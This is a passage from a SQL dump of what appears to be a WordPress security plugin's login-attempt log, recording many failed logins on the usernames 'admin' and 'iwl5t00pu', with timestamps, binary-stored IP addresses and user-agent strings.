Firefox/62.0'),(5008,7607,1629260571.789725,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5009,7608,1629260770.641034,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5010,7609,1629260994.709736,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5011,7610,1629261406.917595,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@Z0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5012,7611,1629261577.730596,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���=�M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5013,7612,1629261809.315884,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5014,7613,1629262188.338705,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5015,7614,1629262391.915211,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gZ�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5016,7615,1629262594.274377,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@�:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5017,7616,1629262816.947837,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5018,7617,1629262996.268424,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5019,7618,1629263225.810745,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5020,7619,1629263406.006834,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5021,7620,1629263602.594156,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1T&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5022,7622,1629264027.991803,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y�ji','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5023,7623,1629264211.490702,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��DF�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5024,7624,1629264413.837715,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5025,7625,1629264620.548446,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"Q�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5026,7626,1629264824.881243,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5027,7627,1629265045.779777,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5028,7628,1629265245.596228,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[L=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5029,7629,1629265420.459051,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5030,7630,1629265652.704806,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5031,7631,1629265825.467918,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5032,7632,1629266029.395947,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\rC1<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5033,7633,1629266248.659329,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5034,7634,1629266463.024244,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5035,7635,1629266658.099969,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5036,7636,1629266846.995929,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5037,7637,1629267068.481564,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5038,7638,1629267258.226016,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����t\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5039,7639,1629267495.652017,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5040,7640,1629267696.219426,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5041,7641,1629268012.259948,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5042,7642,1629268215.106735,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��?�)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5043,7643,1629268417.558054,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5044,7644,1629268646.387036,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5045,7645,1629268832.259919,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5046,7646,1629269032.724781,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5047,7647,1629269242.017683,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\'B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5048,7648,1629269473.817897,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5049,7649,1629269651.876560,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5050,7650,1629269852.186230,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5051,7651,1629270074.609769,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5052,7652,1629270258.346767,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5053,7653,1629270490.215576,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5054,7653,1629270490.307698,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5055,7654,1629270691.506132,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5056,7655,1629270897.908763,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5057,7656,1629271102.357161,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5058,7657,1629271289.708004,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\rL��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5059,7658,1629271493.089352,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5060,7658,1629271493.131848,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5061,7659,1629271724.997363,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5062,7660,1629271905.867753,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5063,7661,1629272124.342182,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5064,7662,1629272344.201111,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���֣%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5065,7663,1629272550.195907,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5066,7664,1629272746.006943,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5067,7665,1629272965.868631,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5068,7666,1629273176.466770,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��J(/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5069,7667,1629273361.895837,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-wS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5070,7668,1629273604.213932,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��X�%1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5071,7669,1629273808.619239,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��|�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5072,7670,1629274018.150834,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5073,7671,1629274200.944004,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5074,7672,1629274440.141473,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��|�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5075,7673,1629274650.247932,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��e�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5076,7674,1629274858.053072,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Kw�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5077,7675,1629275046.694459,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5078,7676,1629275256.041735,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��4>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5079,7677,1629275464.858360,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5080,7678,1629275699.310350,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P��\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5081,7679,1629275924.728545,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5082,7680,1629276103.341027,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5083,7681,1629276338.219724,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y�ji','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5084,7682,1629276555.054356,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\rL��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5085,7683,1629276775.425031,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5086,7684,1629276959.219160,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>�q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5087,7685,1629277186.611122,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5088,7686,1629277385.475349,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5089,7687,1629278361.962477,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5090,7688,1629278688.139808,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5091,7689,1629279075.012899,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3Dp^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5092,7690,1629279431.283542,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5093,7691,1629279802.037196,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���oC�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5094,7692,1629280171.300342,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"Tu�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5095,7693,1629280520.263670,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5096,7694,1629280867.523769,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5097,7695,1629281279.438346,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5098,7696,1629282017.838132,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5099,7697,1629282384.555385,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���vSF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5100,7697,1629282384.596168,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���vSF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5101,7698,1629282766.805724,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5102,7699,1629282962.651421,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5103,7700,1629282962.914191,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5104,7701,1629282963.188785,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5105,7702,1629282963.453639,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5106,7703,1629282963.709841,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5107,7704,1629282963.977064,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5108,7705,1629282964.237180,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5109,7706,1629282964.586691,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5110,7707,1629282964.902408,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5111,7708,1629282965.229913,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5112,7709,1629282965.487100,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5113,7710,1629282965.738627,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5114,7711,1629282966.429387,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5115,7712,1629282966.693753,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5116,7713,1629282966.948957,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5117,7714,1629282967.214346,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5118,7715,1629282967.459127,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5119,7716,1629282967.712265,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5120,7717,1629282967.968606,1,'loginFailInvalidUsername','iwl5t00pu',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5121,7719,1629283144.602111,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5122,7720,1629283466.441679,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���G�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5123,7720,1629283466.457889,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���G�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5124,7721,1629283876.730845,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gZ�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5125,7722,1629284191.033816,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@wP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5126,7723,1629284631.201663,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5127,7724,1629284985.819037,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P��\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5128,7725,1629285369.191578,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5129,7726,1629286085.745002,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5130,7727,1629286452.299586,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5131,7728,1629286846.899624,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gmш','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5132,7729,1629287208.117299,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux 